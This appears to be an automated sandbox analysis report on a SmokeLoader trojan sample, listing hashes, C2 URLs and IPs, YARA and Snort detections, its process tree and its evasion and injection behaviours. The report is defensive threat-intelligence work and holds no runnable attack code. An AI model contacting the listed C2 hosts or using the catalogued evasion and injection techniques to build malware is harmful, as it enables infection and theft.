Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	777186
MD5:	d0bf82e7840b3179b85d665a3ae895a5
SHA1:	f97d45f0df4b91fa8756af2a4ac4b7bc28a79c14
SHA256:	40c8adaee430093bf55e59066013c9ef5959d617751930d1b77944c5bc769527
Tags:	exe
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Snort IDS alert for network traffic

Maps a DLL or memory area into another process

Machine Learning detection for sample

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Deletes itself after installation

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Checks if the current machine is a virtual machine (disk enumeration)

Uses 32bit PE files

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found large amount of non-executed APIs

Classification

Process Tree

System is w10x64

file.exe (PID: 4712 cmdline: C:\Users\user\Desktop\file.exe MD5: D0BF82E7840B3179B85D665A3AE895A5)

explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

1E3.exe (PID: 3536 cmdline: C:\Users\user\AppData\Local\Temp\1E3.exe MD5: B2FDE4A8B7D6AA7E0FA7F853899F1C4F)

vgfsabt (PID: 3120 cmdline: C:\Users\user\AppData\Roaming\vgfsabt MD5: D0BF82E7840B3179B85D665A3AE895A5)

cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://skinndia.com/tmp/", "http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.448104773.00000000005E6000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x721c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x744:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000001.00000003.363432938.0000000000540000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
1.3.file.exe.540000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
1.2.file.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
1.2.file.exe.530e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security

Snort Signatures

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.5 - Destination IP: 93.112.238.85

Timestamp:	192.168.2.593.112.238.8549715802851815 01/03/23-09:46:55.877154
SID:	2851815
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.5 - Destination IP: 175.120.254.9

Timestamp:	192.168.2.5175.120.254.949709802851815 01/03/23-09:46:28.845991
SID:	2851815
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.5 - Destination IP: 195.158.3.162

Timestamp:	192.168.2.5195.158.3.16249708802851815 01/03/23-09:46:27.109616
SID:	2851815
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.5 - Destination IP: 175.120.254.9

Timestamp:	192.168.2.5175.120.254.949719802851815 01/03/23-09:46:58.922198
SID:	2851815
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vtnltmuyju.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: vatra.at

Source: unknown

DNS traffic detected: queries for: vatra.at

Source: global traffic

HTTP traffic detected: GET /systems/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: degroeneuitzender.nl

Source: unknown

HTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.5:49714 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 1.3.file.exe.540000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.530e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.363432938.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Source: vgfsabt, 00000009.00000002.554246147.00000000007AA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.448104773.00000000005E6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000001.00000002.448104773.00000000005E6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040E624	1_2_0040E624
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040E0E0	1_2_0040E0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040AAA8	1_2_0040AAA8
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040FB31	1_2_0040FB31
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040DB9C	1_2_0040DB9C
Source: C:\Users\user\AppData\Roaming\vgfsabt	Code function: 9_2_0040E0E0	9_2_0040E0E0
Source: C:\Users\user\AppData\Roaming\vgfsabt	Code function: 9_2_0040ED1C	9_2_0040ED1C
Source: C:\Users\user\AppData\Roaming\vgfsabt	Code function: 9_2_0040E624	9_2_0040E624
Source: C:\Users\user\AppData\Roaming\vgfsabt	Code function: 9_2_0040AAA8	9_2_0040AAA8
Source: C:\Users\user\AppData\Roaming\vgfsabt	Code function: 9_2_00407B03	9_2_00407B03
Source: C:\Users\user\AppData\Roaming\vgfsabt	Code function: 9_2_0040FB31	9_2_0040FB31
Source: C:\Users\user\AppData\Roaming\vgfsabt	Code function: 9_2_0040DB9C	9_2_0040DB9C
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Code function: 10_2_0040E0E0	10_2_0040E0E0
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Code function: 10_2_0040ED1C	10_2_0040ED1C
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Code function: 10_2_0040E624	10_2_0040E624
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Code function: 10_2_0040AAA8	10_2_0040AAA8
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Code function: 10_2_00407B03	10_2_00407B03
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Code function: 10_2_0040FB31	10_2_0040FB31
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Code function: 10_2_0040DB9C	10_2_0040DB9C

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	1_2_00401615
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	1_2_00401620
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00403428 NtClose,RtlInitUnicodeString,GetModuleHandleA,OpenProcessToken,NtOpenProcess,NtCreateSection,NtAllocateVirtualMemory,NtDuplicateObject,NtOpenKey,NtEnumerateKey,strstr,	1_2_00403428
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00401633 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	1_2_00401633
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00401636 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	1_2_00401636
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004017E4 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	1_2_004017E4
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040159D NtAllocateVirtualMemory,	1_2_0040159D

Source: C:\Users\user\Desktop\file.exe	Section loaded: yosep.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vgfsabt C:\Users\user\AppData\Roaming\vgfsabt
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1E3.exe C:\Users\user\AppData\Local\Temp\1E3.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1E3.exe C:\Users\user\AppData\Local\Temp\1E3.exe	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\vgfsabt

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\1E3.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/3@13/8

Source: C:\Users\user\AppData\Roaming\vgfsabt

Code function: 9_2_0040297F GetModuleHandleA,GetProcAddress,GetCurrentThreadId,VirtualAlloc,ReadConsoleA,SetConsoleDisplayMode,LockResource,GetComputerNameW,SetThreadExecutionState,TlsSetValue,LoadLibraryW,

9_2_0040297F

Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: g#o*	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: Ej^	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: jip5	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: p1Mm	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: 4PJN	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: eXYh	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: `Y7@	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: #h-	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: B;	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: ai	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: 5m!Z	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: @`Fm	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: F`1=	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: C[Ie	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: eW9$	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: %$6	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: T+Zx	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: <4X	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: ua%	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: R\4T	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: ciH	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: "d=	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: <=Tl	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: IBu7	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: cb6E	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: e"3*	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: 5F7	9_2_00402ADC
Source: C:\Users\user\AppData\Roaming\vgfsabt	Command line argument: `I4S	9_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: g#o*	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: Ej^	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: jip5	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: p1Mm	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: 4PJN	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: eXYh	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: `Y7@	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: #h-	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: B;	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: ai	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: 5m!Z	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: @`Fm	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: F`1=	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: C[Ie	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: eW9$	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: %$6	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: T+Zx	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: <4X	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: ua%	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: R\4T	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: ciH	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: "d=	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: <=Tl	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: IBu7	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: cb6E	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: e"3*	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: 5F7	10_2_00402ADC
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Command line argument: `I4S	10_2_00402ADC

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\somiho64\zujejitude\fay.pdb source: 1E3.exe, 1E3.exe, 0000000A.00000000.534315442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 1E3.exe, 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 1E3.exe.6.dr
Source:	Binary string: C:\vopuwonove\puracol.pdb source: file.exe, vgfsabt.6.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 1.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004020AC pushad ; ret	1_2_004020AD
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00402DB9 push esi; ret	1_2_00402DCF
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00532113 pushad ; ret	1_2_00532114
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00532E20 push esi; ret	1_2_00532E36
Source: C:\Users\user\AppData\Roaming\vgfsabt	Code function: 9_2_004048C1 push ecx; ret	9_2_004048D4
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Code function: 10_2_004048C1 push ecx; ret	10_2_004048D4

Source: C:\Users\user\AppData\Roaming\vgfsabt

Code function: 9_2_004028BE LoadLibraryA,GetProcAddress,

9_2_004028BE

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\vgfsabt

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\vgfsabt			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\1E3.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\vgfsabt:Zone.Identifier read attributes | delete

Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Source: C:\Windows\explorer.exe TID: 2396	Thread sleep count: 656 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 260	Thread sleep count: 313 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 260	Thread sleep time: -31300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2880	Thread sleep count: 319 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2880	Thread sleep time: -31900s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\vgfsabt	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_9-6262
Source: C:\Users\user\AppData\Roaming\vgfsabt	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_9-6515
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_10-6514
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_10-6261

Source: C:\Windows\explorer.exe

Window / User API: threadDelayed 656

Jump to behavior

Source: C:\Users\user\AppData\Roaming\vgfsabt	API coverage: 7.0 %
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	API coverage: 7.0 %

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\vgfsabt	API call chain: ExitProcess graph end node			graph_9-6517
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	API call chain: ExitProcess graph end node			graph_10-6515

Source: explorer.exe, 00000006.00000000.385060326.0000000008631000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
